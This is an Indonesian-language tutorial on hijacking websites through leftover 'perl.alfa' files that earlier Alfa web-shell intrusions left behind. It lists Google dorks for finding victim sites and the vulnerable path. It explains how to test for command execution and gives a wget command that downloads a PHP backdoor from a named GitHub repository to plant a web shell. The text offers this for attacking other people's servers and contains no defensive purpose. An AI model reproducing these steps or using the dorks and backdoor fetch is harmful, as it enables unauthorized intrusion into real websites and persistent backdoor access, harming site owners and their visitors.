Tutorial Perl Alfa RCE – Perl Alfa RCE adalah sebuah teknik yang memanfaatkan bekasan eksekusi alfa shell yang terletak pada folder alfacgiapi dan mengeksploitasi kerentanan remote code execution pada file yang ada didalam nya.
Baca juga: Mengenal tentang Remote Code Execution (RCE)
Oke, tidak usah lama-lama langsung saja ke tutorial perl alfa rce nya.
Dork:
intitle:index of perl.alfa
intitle:index of alfacgiapi
intext:"perl.alfa"
Vulnerable path: /ALFA_DATA/alfacgiapi/perl.alfa
Memastikan Kerentanan
Untuk tahap pertama pengeksekusian perl alfa rce, kalian dorking terlebih dahulu menggunakan dork diatas, dan pilih web yang ingin kalian eksekusi. Jika sudah mendapatkan target, kalian pencet file perl.alfa nya, dan apabila blank kemungkinan web tersebut bisa di eksekusi.
Mengeksekusi Target
Disini kita akan mengeksekusi target menggunakan tools khusus. Kalian bisa search di github atau pun memakai tools online. Jika sudah, masukkan target kalian pada url form, dan perintah apa yang ingin kalian jalankan. Sebagai contoh disini saya akan coba melihat kernel yang dipakai.
Perintah tereksekusi 😀 yang berarti web ini kemungkinan bisa di exploitasi lebih jauh. Kalian juga bisa menggunakan perintah linux lainnya.
Mengupload Shell
Pada tahapan upload shell kalian bisa menggunakan perintah wget ataupun curl, sebagai contoh disini saya akan menggunakan perintah wget untuk memanggil shell.
wget https://raw.githubusercontent.com/Kedjaw3n/Backdoor/main/gel4y.php
Coba kita cek apakah shell sudah terupload atau belum.
Shell sudah terupload 😀 tinggal kalian akses shellnya.
